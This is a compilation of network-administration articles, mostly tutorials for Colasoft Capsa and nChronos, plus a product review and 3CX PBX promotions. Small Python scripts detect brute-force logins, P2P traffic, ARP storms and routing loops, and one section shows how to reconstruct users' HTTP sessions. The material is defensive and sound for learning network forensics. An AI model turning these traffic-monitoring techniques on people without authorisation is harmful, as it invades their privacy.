Finally, a Views tab gives very useful and quick access to a number of display modes. These enable panels like the alarm view and let you switch between important options like IP/MAC address only or name only modes.

capsa enterprise v11 views tab

In general, Colasoft has done a great job of packing a lot of information into one application while keeping it customizable. However, there are some areas where it really shines, and its Matrix tab is one of those. With a single click, you can get a visual overview of much of the conversations on a network, with Top 100 MAC, MAC Node, IP Conversation, and IP Node views:

capsa enterprise v11 top 100 mac matrix

Firewall.cx has praised this feature before and it remains a strong highlight of the software. Admins are able to move the lines of the diagrams around at will for clarity, click on each address to view the related packets, and quickly make filters via a right click interface.

capsa enterprise v11 matrix

The information above is from a single PC, so you can imagine how useful it gets once more devices are introduced. You can select individual IP addresses in the node explorer on the left-hand side to get a quick overview of their IP and MAC conversations, with the ability to customize the Matrix for a higher maximum node number, traffic types, and value.

capsa enterprise v11 modify matrix

Thanks to its v7.8 update, Capsa also has support for detailed VoIP Analysis. Users can configure RTP via the System>Decoder menu, with support for multiple sources and destination addresses, encoding types, and ports.

capsa enterprise v11 rtp system decoder

Once everything is configured correctly, admins will begin to see the VoIP Call tab populate with useful information. A summary tab shows the MOS_A/V distribution with ratings between Good (4.24-5.00) and Bad (0.00-3.59). A status column shows success, failure, and rejection, and a diagnosis tab keeps count of setup times, bandwidth rejects, and more. While our test environment didn't contain VoIP traffic, we still included the screenshot below to help give readers the full picture.

capsa enterprise v11 voip traffic analysis

In addition, a window below keeps track of packets, bytes, utilization, and average throughput, as well as various statistics. Finally, the Call tab lists numbers and endpoints, alongside their jitter, packet loss, codec, and more. Like most aspects of Capsa, this data can be exported or turned into a custom report from within the software.
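To give a feel for where MOS figures like the ones above come from, here is a small Python sketch that estimates a MOS score from latency, jitter and packet loss using a widely quoted simplification of the ITU-T E-model. This is not Colasoft's scoring method – it only illustrates the general idea behind the ratings.

# Estimate a MOS score from basic call-quality measurements using a common
# simplification of the ITU-T E-model. Illustrative only.

def estimate_mos(latency_ms: float, jitter_ms: float, loss_percent: float) -> float:
    effective_latency = latency_ms + jitter_ms * 2 + 10
    if effective_latency < 160:
        r = 93.2 - effective_latency / 40
    else:
        r = 93.2 - (effective_latency - 120) / 10
    r -= loss_percent * 2.5                      # penalise packet loss
    r = max(0.0, min(100.0, r))
    return 1 + 0.035 * r + 0.000007 * r * (r - 60) * (100 - r)

print(round(estimate_mos(latency_ms=40, jitter_ms=5, loss_percent=0.5), 2))   # good call
print(round(estimate_mos(latency_ms=300, jitter_ms=40, loss_percent=5), 2))   # poor call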

Capsa Enterprise 11 creates a number of these reports by default. A global report gives an overview of total traffic with MAC address counts, protocol counts, top MAC/IP addresses, and more. There are also separate auto-generated reports for VoIP, Conversation, Top Traffic, Port, and Packet.

capsa enterprise v11 reporting capabilities

You can customize these with logo and author name, but they’re missing many of the features you’d see in advanced reporting software. There’s no option for a pie chart, for example, though they can be created via the node explorer and saved as an image.

Conclusion

Capsa Enterprise 11 is a testament to Colasoft's consistent improvements over the years. It has very few compromises, refusing to skimp on features while still maintaining ease of use. Capsa comes in two flavors – the Enterprise version and the Standard version – making it an extremely affordable and robust toolset that can reduce downtime and make troubleshooting an enjoyable process.

Though its visual design and report features look somewhat dated, the layout is incredibly effective. Admins will spend much of their time in the matrix view but can also make use of very specific filters to deliver only the data they want. It got the Firewall.cx seal of approval last time it was reviewed, and we feel comfortable giving it again.


Detect Brute-Force Attacks with nChronos Network Security Forensic Analysis Tool

colasoft-nchronos-brute-force-attack-detection-1Brute-force attacks are commonly known attack methods by which hackers try to get access to restricted accounts and data using an exhaustive list/database of usernames and passwords. Brute-force attacks can be used, in theory, against almost any encrypted data.

When it comes to user accounts (web based or system based), the first sign of a brute-force attack is when we see multiple attempts to login to an account, therefore allowing us to detect a brute-force attack by analyzing packets that contain such events. We’ll show you how Colasoft’s nChronos can be used to identify brute-force attacks, and obtain valuable information that can help discover the identity of the attacker plus more.

For an attacker to obtain access to a user account on a website via brute force, they must use the site's login page, generating an alarming number of login attempts from their IP address. nChronos is capable of capturing such events and triggering a transaction alarm, warning system administrators that a brute-force attack is under way and showing when the triggering condition was met.
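The detection logic itself is easy to reason about. The Python sketch below (plain Python, not nChronos code) counts requests to a hypothetical /login.html page per source IP in one-minute buckets and flags anything over a threshold – exactly the kind of counting the transaction alarm configured below performs for you.

# Count login-page requests per source IP per minute and flag possible brute force.
# The event list and the /login.html path are illustrative assumptions.
from collections import defaultdict
from datetime import datetime

THRESHOLD = 100  # login attempts per minute

# (timestamp, source IP, requested URL) tuples, e.g. parsed from a web server log
events = [
    (datetime(2023, 7, 9, 13, 41, 5), "203.0.113.7", "/login.html"),
    (datetime(2023, 7, 9, 13, 41, 6), "203.0.113.7", "/login.html"),
    # ... thousands more ...
]

counts = defaultdict(int)
for ts, ip, url in events:
    if url == "/login.html":
        counts[(ip, ts.replace(second=0, microsecond=0))] += 1

for (ip, minute), n in counts.items():
    if n >= THRESHOLD:
        print(f"Possible brute-force: {n} login attempts from {ip} at {minute:%H:%M}")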


Creating A Transaction Analysis & Alarm In nChronos

First, we need to create a transaction analysis to specify the pattern/behavior we are interested in monitoring:

From the nChronos main page, first select the server/IP address we want to monitor from the Server Explorer section.

Next, from the Link Properties, go to the Application section and then the Analysis Settings as shown below:

colasoft-nchronos-brute-force-attack-detection-2a

Figure 1. Creating a Transaction Analysis in nChronos (click to enlarge)

Now click the New Web Application button (the second green button at the top) to set a Web Application, enter a Name and HTTP Hostname, then check the box labeled Enable Transaction Analysis and add a transaction with a URL subpath, e.g. "/login.html".

At this point we’ve created the necessary Transaction Analysis. All that’s required now is to create the Transaction Alarm.

To create the alarm, click Transaction Alarms in the left window, enter the basic information, choose Transaction Statistics as the Type, and then set a Triggering Condition as needed, for example, 100 times in 1 minute. This means that the specific alarm will activate as soon as there are 100 or more login attempts within a minute:

colasoft-nchronos-brute-force-attack-detection-3a

Figure 2. Creating a Transaction Alarm (click to enlarge)

Finally, you can choose Send to email box or Send to SYSLOG to send the alarm notification. Once complete, the transaction alarm for detecting brute-force attack is set. When the alarm triggering condition is met an email notification is sent.

Note that this alarm triggering condition does not examine the number of logins per IP address, which means the condition will be met regardless of whether the 100 login attempts per minute come from one or several IP addresses. This can be changed manually in the Transaction Analysis so that it shows the login attempts of each individual IP address.

Below is a sample output from an alarm triggered:

colasoft-nchronos-brute-force-attack-detection-3a

Figure 3. nChronos Brute-Force alarm triggered – Overall report (click to enlarge)

And below we see the same alarm with a per-IP address analysis:

colasoft-nchronos-brute-force-attack-detection-4a

Figure 4. nChronos Brute-Force alarm triggered – IP breakdown (click to enlarge)

The article shows how nChronos can be used to successfully detect a Brute-Force attack against any node on a network or even websites, and at the same time alert system administrators or IT managers of the event.


Introducing Colasoft Unified Performance Management

Introduction to Colasoft Unified Performance ManagementColasoft Unified Performance Management (UPM) is a business-oriented network performance management system, which analyzes network performance, quality, fault, and security issues based on business. By providing visual analysis of business performances, Colasoft UPM helps users promote business-oriented proactive network operational capability, ensure the stable running of businesses, and enhance troubleshooting efficiency.

Colasoft UPM contains two parts: Chronos Server as a frontend device and UPM Center as the analysis center.

Frontend devices are deployed at the key nodes of the communication link of business systems, which capture business communication data by switch port-mirroring or network TAP. The frontend collects and analyzes the performance index parameters and application alarm information in real-time, and uploads to the UPM Center via the management interface for overall analysis.


UPM Center is deployed at the headquarters to collect the business performance indexes and alarm information uploaded by frontend devices, and display the analysis results.

The start page of Colasoft UPM is shown below:

introduction-to-unified-performance-management-1

Figure 1. Unified Performance Management Homepage (click image to enlarge)

This page shows business and alarm statistics for a selected period of time.

Hovering the mouse over a business sensor (lower left area), we can see there are several options such as “Analyze”, “Query”, “Edit” and “Delete”:

introduction-to-unified-performance-management-2

Figure 2. Adding or analyzing a Business logic sensor to be analyzed (click image to enlarge)

We can click "Analyze" to check the business logic diagram and detailed alarm information.

introduction-to-unified-performance-management-3

Figure 3. Analyzing a business logic and checking for service alarms (click to enlarge)

Click "Query" to check the index parameters and analyze network performance:

introduction-to-unified-performance-management-4

Figure 4. Analyzing performance of a specific application or service (click to enlarge)

We can also click "Intelligent Application" on the homepage to review the relationships between the nodes in the business system:

introduction-to-unified-performance-management-5

Figure 5. The Intelligent Application section reveals the relationship of nodes in the business system

In short, Colasoft UPM helps users easily manage network performance by providing visual analysis based on business, which greatly enhances troubleshooting efficiency and reduces human resource cost.


How to Detect P2P (peer-to-peer) File Sharing, Torrent Traffic & Users with a Network Analyzer

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-1aPeer-to-Peer file sharing traffic has become a very large problem for many organizations, as users engage in (most times illegal) file sharing that not only consumes valuable bandwidth, but also places the organization in danger: high-risk connections are made from the Internet to the internal network, and malware, pirated or copyrighted material or pornography is downloaded onto the organization's systems. The fact that torrent traffic is responsible for over 29% of Internet traffic in North America indicates how big the problem is.

To help network professionals in the P2P battle, we'll show how network analyzers such as Colasoft Capsa can be used to identify users or IP addresses involved in the file sharing process, allowing IT departments to take the necessary actions to block users and similar activities.

While all network analyzers capture and display packets, very few have the ability to display P2P traffic or users creating multiple connections with remote peers - allowing network administrators to quickly and correctly identify P2P activity.


One of the main characteristics of P2P traffic is that hosts create many connections to and from hosts on the Internet, in order to download from multiple sources or upload to multiple destinations.
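As a rough illustration of this principle, the following Python sketch counts how many distinct Internet peers each internal host talks to in a saved capture and flags hosts with an unusually high peer count. The capture file, internal prefix and threshold are assumptions; Capsa surfaces the same information through its Matrix view without any scripting.

# Count distinct remote peers per internal host from a saved capture using scapy.
from collections import defaultdict
from scapy.all import rdpcap, IP

LOCAL_PREFIX = "192.168.1."   # hypothetical internal subnet
PEER_THRESHOLD = 200          # distinct peers before we suspect P2P activity

peers = defaultdict(set)
for pkt in rdpcap("capture.pcap"):        # hypothetical capture file
    if not pkt.haslayer(IP):
        continue
    src, dst = pkt[IP].src, pkt[IP].dst
    if src.startswith(LOCAL_PREFIX) and not dst.startswith(LOCAL_PREFIX):
        peers[src].add(dst)
    elif dst.startswith(LOCAL_PREFIX) and not src.startswith(LOCAL_PREFIX):
        peers[dst].add(src)

for host, remote in sorted(peers.items(), key=lambda kv: len(kv[1]), reverse=True):
    flag = "  <-- possible P2P host" if len(remote) >= PEER_THRESHOLD else ""
    print(f"{host}: {len(remote)} distinct Internet peers{flag}")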

Apart from using the correct tools, network administrators and engineers must also ensure they capture traffic at strategic areas within their network. This means that the network analyzer must be placed at the point where all network traffic, to and from the Internet, passes through it.

The two most common places network traffic is captured are at the router/firewall connecting the organization to the Internet, or at the main switch to which the router/firewall connects. To learn how to configure these devices and enable the network analyzer to capture packets, visit the following articles:

Once capturing commences, data will start being displayed in Capsa and, thanks to the Matrix display feature, we can quickly identify hosts that have multiple conversations or connections with peer hosts on the Internet.

By selecting the Matrix tab and hovering the mouse on a host of interest (this also automatically selects the host), Capsa will highlight all conversations with other IP addresses made by the selected host, while at the same time provide additional useful information such as bytes sent and received by the host, amount of peer connections (extremely useful!) and more:

Figure 1. Using the Capsa Matrix feature to highlight conversations of a specific host suspected of P2P traffic

In most cases, an excessive amount of peer connections means that there is a P2P application running, generating all the displayed traffic and connections.

Next, to drill into the host's traffic, simply click on the Protocol tab to automatically show the amount of traffic generated by each protocol. Here we will happily find the BitTorrent and eMule protocols listed:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-2

Figure 2. Identifying P2P Traffic and associated hosts in Capsa Network Analyzer

The IP Endpoint tab below provides additional useful information such as IP address, bytes of traffic associated with the host, number of packets, total amount of bytes and more.

By double-clicking on the host of interest (under IP EndPoint), Capsa will open a separate window and display all data captured for the subject host, allowing extensive in-depth analysis of packets:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-3

Figure 3. Diving into a host’s captured packets with the help of Capsa Network Analyzer

Multiple UDP conversations through the same port indicate that there may be a P2P download or upload in progress.

Further inspection of packet information such as the info hash, port, remote peer(s), etc. in ASCII decoding mode will confirm that the captured traffic is indeed P2P traffic.
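For those who prefer to script such a check, the short Python sketch below scans a saved capture for well-known BitTorrent markers – the peer-wire handshake string and the info_hash parameter used in HTTP tracker requests. The capture filename is hypothetical.

# Flag packets whose payload contains well-known BitTorrent markers.
from scapy.all import rdpcap, Raw, IP

MARKERS = (b"\x13BitTorrent protocol", b"info_hash")   # handshake and tracker request markers

for pkt in rdpcap("capture.pcap"):                     # hypothetical capture file
    if not pkt.haslayer(Raw) or not pkt.haslayer(IP):
        continue
    payload = bytes(pkt[Raw].load)
    if any(marker in payload for marker in MARKERS):
        print(f"BitTorrent marker found: {pkt[IP].src} -> {pkt[IP].dst}")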

This article demonstrated how the Capsa network analyzer can be used to detect Peer-to-Peer (P2P) traffic in a network environment. We examined the Matrix feature of Capsa, plus its ability to automatically identify P2P/torrent traffic, making it easier for network administrators to track down P2P clients within their organization.


Improve Network Analysis Efficiency with Colasoft's Capsa New Conversation Colorization Feature

how-to-improve-network-analysis-with capsa-colorization-feature-0Troubleshooting network problems can be a very difficult and challenging task. While most IT engineers use a network analyzer to help solve network problems, when analyzing hundreds or thousands of packets, it can become very hard to locate and further research conversations between hosts. Colasoft’s Capsa v8 now introduces a new feature that allows us to highlight-colorize relevant IP conversations in the network based on their MAC address, IP Addresses, TCP or UDP conversations.

This great new feature allows IT engineers to quickly find the related packets of the conversations they want to analyze, using just a few clicks.


As shown in the screenshot below, users can colorize any Conversation in the MAC Conversation View, IP Conversation View, TCP Conversation View and UDP Conversation View. Packets related to that Conversation will be colorized automatically with the same color.

Take a TCP conversation for example: choose one conversation, right-click it and choose "Select Conversation Color" in the pop-up menu:

how-to-improve-network-analysis-with capsa-colorization-feature-01

Figure 1. Selecting a Conversation Color in Capsa v8.0

Next, select the color you wish to use to highlight the specific conversation:

how-to-improve-network-analysis-with capsa-colorization-feature-02

Figure 2. Selecting a color

Once the color has been selected, Capsa will automatically find and highlight all related packets of this conversation using the same background color:

how-to-improve-network-analysis-with capsa-colorization-feature-03

Figure 3. Colasoft Capsa automatically identifies and highlights the conversation

Colorizing packets makes the relationship between a conversation and its packets much clearer, which greatly improves analysis efficiency.


How To Detect ARP Attacks & ARP Flooding With Colasoft Capsa Network Analyzer

ARP attacks and ARP flooding are common problems that small and large networks are faced with. ARP attacks target specific hosts by using their MAC address and responding on their behalf, while at the same time flooding the network with ARP requests. ARP attacks are frequently used for 'man-in-the-middle' attacks, causing serious security threats and loss of confidential information, and should therefore be quickly identified and mitigated.

During ARP attacks, users usually experience slow communication on the network and especially when communicating with the host that is being targeted by the attack.

In this article, we will show you how to detect ARP attacks and ARP flooding using a network analyzer such as Colasoft Capsa.


Colasoft Capsa has one great advantage – the ability to identify and present suspicious ARP attacks without any additional processing, which makes identifying, mitigating and troubleshooting much easier.

The Diagnosis tab provides real-time information and is extremely handy in identifying potential threats, as shown in the screenshot below:

capsa-network-analyzer-discover-arp-attacks-flooding-1

Figure 1. ARP Scan and ARP Storm detected by Capsa's Diagnosis section.

Under the Diagnosis tab, users can click on the Events area and select any suspicious events. When these events are selected, analysis of them (MAC address information in our case) will be displayed on the right as shown above.

In addition to the above analysis, Capsa also provides a dedicated ARP Attack tab, which is used to verify the offending hosts and type of attack as shown below:

capsa-network-analyzer-discover-arp-attacks-flooding-2

Figure 2. ARP Attack tab verifies the security threat.

We can extend our investigation with the use of the Protocol tab, which allows us to drill into the ARP protocol and see which hosts' MAC addresses are involved in heavy ARP traffic:

capsa-network-analyzer-discover-arp-attacks-flooding-3

Figure 3. Drilling into ARP attacks.

Finally, double-clicking on a MAC address in the ARP Protocol section will show all packets related to the selected MAC address.

When double-clicking on a MAC address, Capsa presents all packets captured, allowing us to drill-down to more useful information contained in the ARP packet.

capsa-network-analyzer-discover-arp-attacks-flooding-4

Figure 4. Drilling-down into the ARP attack packets.

By selecting the Source IP in the lower window of the selected packet, we can see the fake IP address 0.136.136.16. This means that any host on the network responding to this packet will be directed to an incorrect and non-existent IP address, indicating an ARP attack or flood.
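The same symptoms can also be spotted with a few lines of scripting, independently of Capsa. The Python sketch below uses scapy to watch for a storm of ARP requests from a single MAC address and for ARP replies that keep changing the MAC claimed for a given IP; the thresholds, timeout and required sniffing privileges are assumptions.

# Watch live ARP traffic for request storms and conflicting replies using scapy.
from collections import defaultdict
from scapy.all import sniff, ARP

request_counts = defaultdict(int)   # ARP requests seen per source MAC
ip_to_mac = {}                      # last MAC seen claiming each IP address

def inspect(pkt):
    if not pkt.haslayer(ARP):
        return
    arp = pkt[ARP]
    if arp.op == 1:                                  # who-has (request)
        request_counts[arp.hwsrc] += 1
        if request_counts[arp.hwsrc] % 500 == 0:
            print(f"Possible ARP scan/storm from {arp.hwsrc} "
                  f"({request_counts[arp.hwsrc]} requests seen)")
    elif arp.op == 2:                                # is-at (reply)
        known = ip_to_mac.get(arp.psrc)
        if known and known != arp.hwsrc:
            print(f"Conflicting ARP reply: {arp.psrc} claimed by {known} and {arp.hwsrc}")
        ip_to_mac[arp.psrc] = arp.hwsrc

# Needs sufficient privileges to sniff; stops after 30 seconds in this sketch.
sniff(filter="arp", prn=inspect, store=False, timeout=30)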

If you're a network administrator, engineer or IT manager, we strongly suggest you try out Colasoft Capsa today and see how easily you can troubleshoot and resolve network problems and security threats such as ARP attacks and ARP flooding.


How to Reconstruct HTTP Packets/Data & Monitor HTTP User Activity with NChronos

HTTP reconstruction is an advanced network security feature offered by nChronos version 4.3.0 and later. nChronos is a Network Forensic Analysis application that captures packets/data around the clock. With HTTP reconstruction, network security engineers and IT managers can uncover suspicious user web activity and check user web history to examine specific HTTP incidents or HTTP data transferred in/out of the corporate network.

Now let's take a look at how to use this new feature with Colasoft nChronos.


The HTTP reconstruction feature can be easily selected from the Link Analysis area. We first need to carefully select the time range required to be examined e.g 9th of July between 13:41 and 13:49:15. Once the time range is selected, we can move to the bottom window and select the IP Address tab to choose the IP address of interest:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-1

Figure 1. Selecting our Time-Range, and IP Address of interest from Link Analysis

nChronos further allows us to filter internal and external IP addresses, to help quickly identify the IP address of interest. We selected External IP and then address 173.205.14.226.

All that's required at this point is to right-click on the selected IP address and choose HTTP Packet Reconstruction from the pop-up menu. Once HTTP Packet Reconstruction is selected, a new tab will open and the reconstruction process will begin as shown below:


nchronos-how-to-reconstruct-monitor-http-data-packets-captured-2

Figure 2. nChronos HTTP Reconstruction feature in progress.

A progress bar at the top of the window shows the progress of the HTTP Reconstruction. Users are able to cancel the process anytime they wish and once the HTTP Reconstruction is complete, the progress bar disappears.

The screenshot below shows the end result once the HTTP Reconstruction has successfully completed:

nchronos-how-to-reconstruct-monitor-http-data-packets-captured-3

Figure 3. The HTTP Reconstruction process completed

As shown in the above screenshot, nChronos fully displays the reconstructed page in an easy-to-understand manner. Furthermore, all HTTP requests and commands are included to ensure complete visibility of the HTTP protocol commands sent to the remote web server, along with the user's browser and all other HTTP parameters.

nChronos's HTTP reconstruction feature can prove to be an extremely important security tool for network engineers, administrators and IT Managers who need to keep an eye on incoming/outgoing web traffic. This new feature surpasses web proxy reporting and other similar tools as it is able to completely reconstruct the webpage visited, data exchanged between the server and client, plus help identify/verify security issues with hijacked websites.


How to Use Multi-Segment Analysis to Troubleshoot Network Delay, Packet Loss and Retransmissions with Colasoft nChronos

network-troubleshooting-multi-segment-analysis-with-nchronos-00Troubleshooting network problems can be a very intensive and challenging process. Intermittent network problems are even more difficult to troubleshoot as the problem occurs at random times with a random duration, making it very hard to capture the necessary information, perform troubleshooting, identify and resolve the network problem.
 
While Network Analyzers help reveal problems in a network data flow, they are limited to examining usually only one network link at a time, thus seriously limiting the ability to examine multiple network segments continuously.

nChronos is equipped with a neat feature called multi-segment analysis, providing an easy way for IT network engineers and administrators to compare the performance between different links. IT network engineers can improve network performance by enhancing the capacity of the link according to the comparison.

Let's take a look at how we can use Colasoft nChronos's multi-segment analysis feature to help us detect and deal effectively with network problems.


Multi-segment analysis provides concurrent analysis for conversations across different links, from which we can extract valuable information on packet loss, network delay, data retransmission and more.

To begin, we open the nChronos Console and select a portion of the trend chart in the Link Analysis window; then, from the Summary window below, we right-click one conversation under the IP Conversation or TCP Conversation tab. From the pop-up menu, select Multi-Segment Analysis to open the Multi-Segment Analysis window:

network-troubleshooting-multi-segment-analysis-with-nchronos-01
Figure 1. Launching Multi-Segment Analysis in nChronos

In the Multi-Segment Analysis window, select a minimum of two and maximum of three links, then choose the stream of interest for multi-segment analysis:

 network-troubleshooting-multi-segment-analysis-with-nchronos-02
Figure 2. Selecting a stream for multi-segment analysis in nChronos

When choosing a conversation for multi-segment analysis, if any of the other selected network links carries the same conversation, it will be selected and highlighted automatically. In our example, the second selected link does not carry the same conversation as the primary selection, and therefore there is no data to display in the lower section of the analysis window.

Next, click Start to Analyze to open the Multi-Segment Detail Analysis window, as shown in the figure below:

 network-troubleshooting-multi-segment-analysis-with-nchronos-03
Figure 3. Performing Multi-Segment analysis in nChronos

The Multi-Segment Detail Analysis section on the left provides a plethora of parameter statistics (analyzed below), a time sequence chart, and there’s a packet decoding pane on the lower right section of the window.

The left pane provides statistics on uplink and downlink packet loss, uplink and downlink network delay, uplink and downlink retransmission, uplink and downlink TCP flags, and much more.

The time sequence chart located at the top, graphically displays the packet transmission between the network links, with the conversation time displayed on the horizontal axis.

When you click on a packet on the time sequence chart, the packet decoding pane will display the detailed decoding information for that packet.

Using the Multi-Segment Analysis feature, Colasoft’s nChronos allows us to quickly compare the performance between two or more network links.


How to Detect Routing Loops and Physical Loops with a Network Analyzer

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01aWhen working with medium to large scale networks, IT departments are often faced with network loops and broadcast storms caused by user error, faulty network devices or incorrect configuration of network equipment. Network loops and broadcast storms are capable of causing major network disruptions and must therefore be dealt with very quickly.

There are two kinds of network loops and these are routing loops and physical loops.

Routing loops are caused by the incorrect configuration of routing protocols, where data packets sent between hosts on different networks are caught in an endless loop, travelling between routers with incorrect route entries.

A Physical loop is caused by a loop link between devices. A common example is two switches with two active Ethernet links between them. Broadcast packets exiting the links on one switch are replicated and sent back from the other switch. This is also known as a broadcast storm.

Both types of loops can cause major network outages, waste valuable bandwidth and disrupt network communications.

We will show you how to detect routing loops and physical loops with a network analyzer such as Colasoft Capsa or Wireshark.

Note: To capture packets on a port that's connected to a Cisco Catalyst switch, users can also read our Configuring SPAN On Cisco Catalyst Switches - Monitor & Capture Network Traffic/Packets

If there are routing loops or physical loops in the network, Capsa will immediately report them in the Diagnosis tab as shown below. This makes troubleshooting easier for network managers and administrators:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-01 
Figure 1. Capsa quickly detects and displays Routing and Physical Loops

Further examination of Capsa’s findings is possible by simply clicking on each detected problem. This allows us to further check the characteristics of the related packets and then decide what action must be taken to rectify the problem.


Drilling Into Our Captured Information

Let’s take a routing loop for example. First, find out the related conversation using Filter (red arrow) in the MAC Conversation tab. MAC addresses can be obtained easily from the notices given in the Diagnosis tab:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-02

Figure 2. Obtaining more information on a Routing Loop problem

Next, double-click the conversation to load all related packets and additional information. Click on Identifier to view the values of all packets under the Decode column, which in our case are all the same. This effectively means that the packets captured in our example are the same packet, continuously transiting our network because it is caught in a loop. For example, Router-A might be sending it to Router-B, which in turn sends it back to Router-A.

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-03
Figure 3. Decoding packets caught in a routing loop

Now click on the Time To Live section below, and you'll see the Decode value decrease gradually. This is because the TTL value is decreased by 1 each time the packet transits a routing device. When the TTL reaches 1, the packet is discarded, which prevents packets from travelling indefinitely in case of a routing loop in the network. More information on the ICMP protocol can be found in our ICMP Protocol page:

 how-to-detect-routing-and-physical-loops-using-a-network-analyzer-04
Figure 4. Routing loop causing ICMP TTL to decrease

The method used to analyze physical loops is almost identical, but the TTL values of all looped packets remain the same, instead of decreasing as we previously saw. Because the packet is trapped in our local network, it doesn’t traverse a router, therefore the TTL does not change.

Below we see a DNS Query packet that is trapped in a network loop:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-05
Figure 5. Discovering Network loops and why their TTL values do not decrease
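The same TTL-based distinction can be scripted outside of Capsa. The Python sketch below groups duplicate packets in a saved capture by their IP Identifier and compares the TTL values: a set of decreasing TTLs points to a routing loop, while many identical copies with a constant TTL point to a physical loop. The capture filename and the repetition threshold are assumptions.

# Group duplicate packets by IP Identifier and compare TTLs to classify the loop type.
from collections import defaultdict
from scapy.all import rdpcap, IP

seen = defaultdict(list)   # (src, dst, IP id) -> list of TTLs observed

for pkt in rdpcap("capture.pcap"):          # hypothetical capture file
    if pkt.haslayer(IP):
        ip = pkt[IP]
        seen[(ip.src, ip.dst, ip.id)].append(ip.ttl)

for (src, dst, ident), ttls in seen.items():
    if len(ttls) < 5:                       # ignore packets not seen repeatedly
        continue
    if len(set(ttls)) > 1:
        print(f"Routing loop suspect {src} -> {dst} (id {ident}): "
              f"TTLs {sorted(set(ttls), reverse=True)}")
    else:
        print(f"Physical loop suspect {src} -> {dst} (id {ident}): "
              f"{len(ttls)} copies, TTL constant at {ttls[0]}")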

Advanced network analyzers allow us to quickly detect serious network problems that can cause network outages, packet loss, packet flooding and more.


3CX Unified Communications New Web Client IP Phone, Web Meetings, Click-to-Call & More with V15.5

3cx video conferenceThe developers of the popular software PBX, 3CX, have announced another major update to their unified communications solution! The latest release, 3CX v15.5, makes the phone system faster, more secure and more reliable with a number of improvements and brand new features. 

 Notably, v15.5 brings with it a totally new concept for the PBX system, a completely web-based softphone client that can be launched straight from any open-standards browser. The web client has an attractive, modern interface which makes it incredibly user-friendly, allowing tasks such as call transferring, deskphone control and more to be carried out in a single click.

3CX's Web Client provides leading features packed in an easy-to-use GUI

Unified Communications IP PBX That Can Be Deployed Anywhere

Furthering their commitment to providing an easy to install and manage PBX, 3CX has also made deployment easier and more flexible. 3CX can be deployed on MiniPC appliances of leading brands such as Intel, Zotac, Shuttle and Gigabyte meaning that businesses on a budget can ensure enterprise level communications at a fraction of the price.

Additionally, 3CX offers more freedom of choice when it comes to deploying the PBX in the cloud, with more supported hosting providers, such as 1&1, and an easy-to-use 8-step wizard that allows customers and resellers to have a fully configured PBX up and running in minutes.

IP PBX With Integrated Web Conferencing

The brand new web client includes integrated web conferencing completely free of charge without any additional licensing or administration. Video conferences are held directly from the browser with no additional downloads or plugins, and most importantly, this applies to remote participants as well!

3CX: IP PBX Web Client with integrated Web Conferencing Free of Charge!

More Reliable, Easier to Control Your Deskphone or Smartphone

By implementing the uaCSTA standard for deskphones, 3CX has significantly improved remote control of phones. This has ensured more reliable control of IP phones regardless of the location of the extension or whether or not the PBX is being run on-premise or in the cloud. Moreover, the 3CX smartphone clients for Android and iOS can now also be remote controlled.

3CX's Click-to-Call Feature from any Web page or CRM

Additional Improvements & Features Include:

  • Click2Call Chrome Extension to dial from any web page or CRM
  • Integrated Hotel Module
  • Support for Google Firebase PUSH
  • Achieve PCI compliance in financial environments

3CX's Unified Communications IP PBX enhanced to include New Web Client, Rich CTI/IP Phone Control, Free Hotel Module & Fax over G.711 - Try it Today for Free!

3CX has done it again! Working on its multi-platform, core v15 architecture, the UC solution developers have released the latest version of its PBX in Alpha, v15.5. The new build includes some incredibly useful features including a web client - a completely new concept for this product.

3CX has made big efforts to ensure its IP PBX product remains one of the best free UC IP PBX systems available!

The new 3CX Intuitive web client that leaves competitors miles behind

User-Friendly & Feature-Rich

The 3CX Web Client, built on the latest web technology (angular 4), currently works in conjunction with the softphone client for calls, and allows users to communicate and collaborate straight from the browser. The modern, intuitive interface combines key 3CX features including video conferencing, chat, switchboard and more, improving overall usability.

Improved CTI/IP Phone Control

3CX IP PBX cti ip phone call

Desktop call control has been massively improved. Even if your phone system is running in the cloud, supported phones can be reliably controlled from the desktop client. This improvement follows the switch to uaCSTA technology. Moreover, a new Click2Call Chrome extension makes communication seamless across the client and browser.

Reintroduction Of The Hotel Module Into 3CX

The Hotel Module has been restored into 3CX and is now included free of charge for all PRO/Enterprise licenses - great news for those in the hospitality industry.

Additionally, 3CX now supports Google’s FIREBASE push, and fax over G711 has been added amongst various other improvements and features.


How to Get a Free Fully Functional Cloud-Based Unified Communications PBX with Free Trial Hosting on Google Cloud, Amazon or OVH!

3cx ip pbx client consoleCrazy as it might sound there is one Unified Communications provider who is giving out free fully functional cloud-based PBX systems without obligation from its users/customers.

3CX, a leader in Unified Communications, has just announced the availability of its new PBX Express online wizard designed to easily deploy a PBX in your own cloud account

3CX’s Advanced Unified Communications features were recently covered in our article The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses. In the article we examined the common components of a modern Unified Communications platform and how they are all configured to work together enabling free real-time communications and presence for its users no matter where they are in the world.

Now Free Cloud-based services are added to the list and the features are second to none plus they provide completely Free Trial Hosting, Domain Name, associated SSL certificates and much more!

3CX's intuitive dashboard allows quick & easy administration with zero prior experience!

Here’s what the Free Unified Communications PBX includes:

  • Free fully-functional Unified Communications PBX
  • Up to 8 simultaneous calls
  • Ability to make/receive calls on your SIP phones or mobile devices via IP
  • Full Support for iPhone and Android devices
  • Full support for iPads and Tablet devices
  • Presence Services (See who’s online, availability, status etc.)
  • Instant Messaging
  • Video conferencing
  • Desktop Sharing
  • Zero Maintenance – Everything is taken care of for you!
  • Free Domain Name selection (over 20 countries to select from!)
  • Free Trial Hosting on Google Cloud – Amazon Web Services or OVH!
  • SSL Certificate
  • Fast deployment- no previous experience required
  • Super-easy administration
  • …and much more!

3CX’s Unified Communications PBX system is an advanced, flexible PBX that can be run locally in your office at no cost which is why thousands of companies are switching to 3CX. With the choice of an on-premises solution that supports Windows and Linux operating systems and now the free cloud-based hosting – it has become a one-way solution for companies seeking to move to an advanced Unified Communications system but at the same time seeking to dramatically cut telecommunication costs.

